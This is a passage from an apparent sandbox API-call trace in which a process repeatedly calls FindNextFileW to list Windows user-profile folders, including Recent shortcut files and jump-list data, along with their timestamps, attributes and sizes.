ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e87ab80, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.291] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e870f40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0220.291] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e819100, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e81b810, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xdff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.library-ms", cAlternateFileName="DOCUME~1.LIB")) returned 1 [0220.292] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e873650, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e875d60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xdd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.library-ms", cAlternateFileName="MUSIC~1.LIB")) returned 1 [0220.292] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e840200, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e842910, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xdf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures.library-ms", cAlternateFileName="PICTUR~1.LIB")) returned 1 [0220.292] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e8624e0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e864bf0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xde2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 1 [0220.292] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.292] GetLastError () returned 0x12 [0220.292] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0220.293] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.293] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.293] GetLastError () returned 0x12 [0220.294] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0220.294] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.294] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.294] GetLastError () returned 0x12 [0220.294] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0220.295] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.295] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0220.295] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.295] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.295] GetLastError () returned 0x12 [0220.296] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.296] GetLastError () returned 0x12 [0220.296] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76c61140, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x76c61140, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0220.296] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76c61140, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x76c61140, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.296] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637f85f0, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x637f85f0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x637f85f0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0xd9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yhW.lnk", cAlternateFileName="")) returned 1 [0220.296] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63acc010, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63acc010, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63acc010, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x9ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="00OQUBV0TbPr1-.lnk", cAlternateFileName="00OQUB~1.LNK")) returned 1 [0220.297] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76c61140, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x76c61140, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x76c61140, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x0, cFileName="0706_1643278086845.lnk", cAlternateFileName="0706_1~1.LNK")) returned 1 [0220.297] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61469d50, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x61469d50, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x61469d50, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x3e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="0Q4eQJS1fRFHDf4LHgo.lnk", cAlternateFileName="0Q4EQJ~1.LNK")) returned 1 [0220.297] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63f42950, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63f42950, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63f42950, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x0, dwReserved1=0x0, cFileName="1GOe.lnk", cAlternateFileName="")) returned 1 [0220.297] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63ef6690, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63ef6690, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63ef6690, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0xeca, dwReserved0=0x0, dwReserved1=0x0, cFileName="2c7cq i.lnk", cAlternateFileName="2C7CQI~1.LNK")) returned 1 [0220.297] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63fdaed0, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63fdaed0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x64001030, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0xa0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="2jNjo6V-ieJZ2g-cGy.lnk", cAlternateFileName="2JNJO6~1.LNK")) returned 1 [0220.298] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63b64590, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63b64590, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63b64590, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x1368, dwReserved0=0x0, dwReserved1=0x0, cFileName="2rpzd.flv.lnk", cAlternateFileName="2RPZDF~1.LNK")) returned 1 [0220.298] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63c95090, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63c95090, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63c95090, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x393, dwReserved0=0x0, dwReserved1=0x0, cFileName="2zwmhDvSMi6qU Bqz.lnk", cAlternateFileName="2ZWMHD~1.LNK")) returned 1 [0220.298] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64131b30, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x64131b30, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x64131b30, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x3cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="31wG DCrr 3WhY.lnk", cAlternateFileName="31WGDC~1.LNK")) returned 1 [0220.298] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63f68ab0, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63f68ab0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63f68ab0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x2bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="4_S-NX_0O.lnk", cAlternateFileName="4_S-NX~1.LNK")) returned 1 [0220.298] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62917c70, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x62917c70, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x62917c70, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x0, dwReserved1=0x0, cFileName="6 Hfe.pdf.lnk", cAlternateFileName="6HFEPD~1.LNK")) returned 1 [0220.298] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63b182d0, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63b182d0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63b182d0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x99d, dwReserved0=0x0, dwReserved1=0x0, cFileName="6VOT_1i.lnk", cAlternateFileName="")) returned 1 [0220.299] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63713db0, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63713db0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63713db0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x3c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="7-h91TW7dfUZ.flv.lnk", cAlternateFileName="7-H91T~1.LNK")) returned 1 [0220.299] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x635e32b0, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x635e32b0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x635e32b0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0xec9, dwReserved0=0x0, dwReserved1=0x0, cFileName="7G Gf.lnk", cAlternateFileName="7GGF~1.LNK")) returned 1 [0220.299] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63e84270, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63e84270, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63e84270, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x254, dwReserved0=0x0, dwReserved1=0x0, cFileName="7Go1pc8I2GKFuOV1rPuh.swf.lnk", cAlternateFileName="7GO1PC~1.LNK")) returned 1 [0220.299] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63c6ef30, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63c6ef30, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63c6ef30, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0xa21, dwReserved0=0x0, dwReserved1=0x0, cFileName="8Y3c9ceIHoIOSxxbjsD.lnk", cAlternateFileName="8Y3C9C~1.LNK")) returned 1 [0220.299] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6322b050, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x6322b050, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x6322b050, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x9be, dwReserved0=0x0, dwReserved1=0x0, cFileName="aH1-R1w8iF.lnk", cAlternateFileName="AH1-R1~1.LNK")) returned 1 [0220.299] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6141da90, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x6141da90, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x6141da90, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0xe7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="aIwmyqQv0bCFcw.pdf.lnk", cAlternateFileName="AIWMYQ~1.LNK")) returned 1 [0220.300] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63aa5eb0, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63aa5eb0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63aa5eb0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0xec9, dwReserved0=0x0, dwReserved1=0x0, cFileName="akJHP.lnk", cAlternateFileName="")) returned 1 [0220.300] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64073450, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x64073450, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x640995b0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x2f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="As8sdCErTyVcdPSQyshm.lnk", cAlternateFileName="AS8SDC~1.LNK")) returned 1 [0220.300] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63890b70, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x63890b70, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x63890b70, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x9c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="audmND77_1O.lnk", cAlternateFileName="AUDMND~1.LNK")) returned 1 [0220.300] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76beed20, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x76beed20, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutomaticDestinations", cAlternateFileName="AUTOMA~1")) returned 1 [0220.300] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76beed20, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x76beed20, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.300] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x76c13710, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0xea00, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.automaticDestinations-ms", cAlternateFileName="1B4DD6~1.AUT")) returned 1 [0220.301] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47876c70, ftCreationTime.dwHighDateTime=0x1d706ac, ftLastAccessTime.dwLowDateTime=0x47876c70, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0xd46a47e0, 